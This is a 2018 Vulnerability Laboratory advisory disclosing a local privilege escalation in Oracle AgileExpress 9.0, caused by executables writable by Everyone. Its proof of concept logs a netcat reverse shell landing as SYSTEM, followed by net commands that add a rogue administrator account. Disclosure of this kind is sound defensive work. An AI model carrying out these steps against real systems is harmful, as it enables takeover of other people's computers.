Document Title: =============== Oracle AgileExpress v9.0 - Privilege Escalation Vulnerability Date: ===== 2018-01-16 References: =========== https://www.vulnerability-lab.com/get_content.php?id=2114 VL-ID: ===== 2114 Common Vulnerability Scoring System: ==================================== 4.2 Vulnerability Class: ==================== Privilege Escalation Introduction: ============= Agile eXpress allows Agile users to create a PDX package containing product definition data and publish it to their partners. Interested parties can then view the data using Agile eXpress even if they don't have access to the Agile server. The Agile Web Client allows you to import product data created on another system or another Agile system into your Agile system. Using Agile eXpress and the Agile Web Client, customers and partners can exchange all product information required to build a new product or change an existing product. (Copy of the Homepage: http://agile-express.software.informer.com/ ) Abstract: ========= The vulnerability laboratory core research team discovered a local privilege escalation vulnerability in the Oracle AgileExpress 9.0 software. Report-Timeline: ================ 2017-11-02: Researcher Notification & Coordination (SaifAllah benMassaoud) 2017-11-03: Vendor Notification (Oracle Security Alerts) 2017-11-29: Vendor Response/Feedback (Oracle Security Alerts) 2017-12-04: Vendor Response/Feedback (Oracle Security Alerts - Remove of Software) 2017-12-04: Vendor Response/Feedback (Security Acknowledgement) (Oracle Security Alerts - Security-In-Depth Contributors) 2018-01-16: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Exploitation-Technique: ======================= Local Severity: ========= Medium Details: ======== A local path privilege escalation vulnerability has been discovered in the official Oracle AgileExpress 9.0 software. The local security vulnerability allows an attackers to gain higher access privileges by exploitation of the weak software files permissions misconfiguration. The software suffers from a local privilege escalation vulnerability. Users are able to change the files with executable access to a binary of choice. The issue is located in the misconfigured permission values with the `F`(full) flag in the users and the everyone group. The group/user permission for the path is assigned to the everyone group. Local attackers could exploit the vulnerability by replace files with a malicious executable file. The malicious file is exectuable with the local system user permissions by misconfiguration. The security risk of the vulnerability is estimated as medium. Exploitation of the software vulnerability requires a low privilege system user account with restricted access and without user interaction. Successful exploitation of the vulnerability results in system process compromise and further manipulation or exploitation to compromise the local computer operating system. Proof of Concept: ================= The local privilege escalation vulnerability can be exploited by local attackers without user interaction and with system user account. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. --- Session Logs (PRIVILEGES) --- Medium Mandatory Level (Default) [No-Write-Up] RW Everyone FILE_ALL_ACCESS <----------------------------- RW BUILTINAdministrators READ_CONTROL WRITE_DAC Owner : BUILTINAdministrators Group : MACHINE-PCNone Access : Everyone Allow FullControl <----------------------------- Sddl : O:BAG:S-1-5-21-3389066293-2711879841-802680780-513D:AI(A;OICIID;FA;WD) --- Session Logs (AGILEEXPRESS / PERMISSIONS) --- [+] AgileExpress.exe ======> Everyone:(I)(F) Path Owner Access ---- ----- ------ AgileExpress.exe BUILTINAdministrators Everyone Allow FullControl --- Session Logs (UNINSTALL / PERMISSIONS) --- [+] Uninstall Agile eXpress.exe ======> Everyone:(I)(F) --- Session Logs (RESOURCE / PERMISSIONS) --- [+] remove.exe ======> Everyone:(I)(F) [+] ZGWin32LaunchHelper.exe ======> Everyone:(I)(F) --- Session Logs (JREBIN / PERMISSIONS) --- [+] appletviewer.exe ======> Everyone:(I)(F) [+] apt.exe ======> Everyone:(I)(F) [+] extcheck.exe ======> Everyone:(I)(F) [+] idlj.exe ======> Everyone:(I)(F) [+] jabswitch.exe ======> Everyone:(I)(F) [+] jar.exe ======> Everyone:(I)(F) [+] jarsigner.exe ======> Everyone:(I)(F) [+] java-rmi.exe ======> Everyone:(I)(F) [+] java.exe ======> Everyone:(I)(F) [+] javac.exe ======> Everyone:(I)(F) [+] javadoc.exe ======> Everyone:(I)(F) [+] javafxpackager.exe ======> Everyone:(I)(F) [+] javah.exe ======> Everyone:(I)(F) [+] javap.exe ======> Everyone:(I)(F) [+] javaw.exe ======> Everyone:(I)(F) [+] javaws.exe ======> Everyone:(I)(F) [+] jcmd.exe ======> Everyone:(I)(F) [+] jconsole.exe ======> Everyone:(I)(F) [+] jdb.exe ======> Everyone:(I)(F) [+] jhat.exe ======> Everyone:(I)(F) [+] jinfo.exe ======> Everyone:(I)(F) [+] jmap.exe ======> Everyone:(I)(F) [+] jps.exe ======> Everyone:(I)(F) [+] jrunscript.exe ======> Everyone:(I)(F) [+] jsadebugd.exe ======> Everyone:(I)(F) [+] jstack.exe ======> Everyone:(I)(F) [+] jstat.exe ======> Everyone:(I)(F) [+] jstatd.exe ======> Everyone:(I)(F) [+] jvisualvm.exe ======> Everyone:(I)(F) [+] keytool.exe ======> Everyone:(I)(F) [+] kinit.exe ======> Everyone:(I)(F) [+] klist.exe ======> Everyone:(I)(F) [+] ktab.exe ======> Everyone:(I)(F) [+] native2ascii.exe ======> Everyone:(I)(F) [+] orbd.exe ======> Everyone:(I)(F) [+] pack200.exe ======> Everyone:(I)(F) [+] packager.exe ======> Everyone:(I)(F) [+] policytool.exe ======> Everyone:(I)(F) [+] rmic.exe ======> Everyone:(I)(F) [+] rmid.exe ======> Everyone:(I)(F) [+] rmiregistry.exe ======> Everyone:(I)(F) [+] schemagen.exe ======> Everyone:(I)(F) [+] serialver.exe ======> Everyone:(I)(F) [+] servertool.exe ======> Everyone:(I)(F) [+] tnameserv.exe ======> Everyone:(I)(F) [+] unpack200.exe ======> Everyone:(I)(F) [+] wsgen.exe ======> Everyone:(I)(F) [+] wsimport.exe Everyone:(I)(F) [+] xjc.exe ======> Everyone:(I)(F) Path Owner Access ---- ----- ------ appletviewer.exe BUILTINAdministrators Everyone Allow FullControl apt.exe BUILTINAdministrators Everyone Allow FullControl extcheck.exe BUILTINAdministrators Everyone Allow FullControl idlj.exe BUILTINAdministrators Everyone Allow FullControl jabswitch.exe BUILTINAdministrators Everyone Allow FullControl jar.exe BUILTINAdministrators Everyone Allow FullControl jarsigner.exe BUILTINAdministrators Everyone Allow FullControl java-rmi.exe BUILTINAdministrators Everyone Allow FullControl java.exe BUILTINAdministrators Everyone Allow FullControl javac.exe BUILTINAdministrators Everyone Allow FullControl javadoc.exe BUILTINAdministrators Everyone Allow FullControl javafxpackager.exe BUILTINAdministrators Everyone Allow FullControl javah.exe BUILTINAdministrators Everyone Allow FullControl javap.exe BUILTINAdministrators Everyone Allow FullControl javaw.exe BUILTINAdministrators Everyone Allow FullControl javaws.exe BUILTINAdministrators Everyone Allow FullControl jcmd.exe BUILTINAdministrators Everyone Allow FullControl jconsole.exe BUILTINAdministrators Everyone Allow FullControl jdb.exe BUILTINAdministrators Everyone Allow FullControl jhat.exe BUILTINAdministrators Everyone Allow FullControl jinfo.exe BUILTINAdministrators Everyone Allow FullControl jmap.exe BUILTINAdministrators Everyone Allow FullControl jps.exe BUILTINAdministrators Everyone Allow FullControl jrunscript.exe BUILTINAdministrators Everyone Allow FullControl jsadebugd.exe BUILTINAdministrators Everyone Allow FullControl jstack.exe BUILTINAdministrators Everyone Allow FullControl jstat.exe BUILTINAdministrators Everyone Allow FullControl jstatd.exe BUILTINAdministrators Everyone Allow FullControl jvisualvm.exe BUILTINAdministrators Everyone Allow FullControl keytool.exe BUILTINAdministrators Everyone Allow FullControl kinit.exe BUILTINAdministrators Everyone Allow FullControl klist.exe BUILTINAdministrators Everyone Allow FullControl ktab.exe BUILTINAdministrators Everyone Allow FullControl native2ascii.exe BUILTINAdministrators Everyone Allow FullControl orbd.exe BUILTINAdministrators Everyone Allow FullControl pack200.exe BUILTINAdministrators Everyone Allow FullControl packager.exe BUILTINAdministrators Everyone Allow FullControl policytool.exe BUILTINAdministrators Everyone Allow FullControl rmic.exe BUILTINAdministrators Everyone Allow FullControl rmid.exe BUILTINAdministrators Everyone Allow FullControl rmiregistry.exe BUILTINAdministrators Everyone Allow FullControl schemagen.exe BUILTINAdministrators Everyone Allow FullControl serialver.exe BUILTINAdministrators Everyone Allow FullControl servertool.exe BUILTINAdministrators Everyone Allow FullControl tnameserv.exe BUILTINAdministrators Everyone Allow FullControl unpack200.exe BUILTINAdministrators Everyone Allow FullControl wsgen.exe BUILTINAdministrators Everyone Allow FullControl wsimport.exe BUILTINAdministrators Everyone Allow FullControl xjc.exe BUILTINAdministrators Everyone Allow FullControl --------- ( NET USER SAIF ) --------- User name saif Full Name Comment User's comment Country code 000 (System Default) Account active Yes Account expires Never Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon Never Logon hours allowed All Local Group Memberships *Users Global Group memberships *None The command completed successfully. --------- ( NET LOCALGROUP ADMINISTRATORS ) --------- net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator dell < ------------ The command completed successfully. - WHOAMI ====> MACHINE-PCsaif c:UsersSaifDesktopNcnc.exe -lvp 4433 Listening on [any] 4433 ... Connect to [ 192.168............ ] from [ 192.168............ ] 49500 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:WindowsSystem32>whoami whoami NT AUTHORITYSYSTEM < ------------ C:WindowsSystem32>net user /add test test The command completed successfully. C:WindowsSystem32>net localgroup administrators /add test test The command completed successfully. C:WindowsSystem32>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator dell test < ------------ The command completed successfully. --------- ( NET USER TEST ) --------- User name test Full Name Comment User's comment Country code 000 (System Default) Account active Yes Account expires Never Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon Never Logon hours allowed All Local Group Memberships *Administrators *Users Global Group memberships *None The command completed successfully. - NOTE : Simple User can Manage Another [administrators - Users] Accounts : [+] Change Accounts Names [+] Change Passwords [+] Remove Passwords [+] Set up Parental Controls [+] Change Accounts Types [+] Delete Accounts Solution: ========= Oracle inadvertently listed this software on Oracle Technology Network and they remove the software and documentation from their download site: Link : http://www.oracle.com/technetwork/apps-tech/index-097651.html Link : http://www.oracle.com/technetwork/agileexpress-license-152008.html Risk: ===== The security risk of the local privilege escalation vulnerability in Oracle AgileExpress v9.0 software is estimated as medium (cvss 4.2). Credits: ======== S.AbenMassaoud [saifmassaoudi18@gmail.com] - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™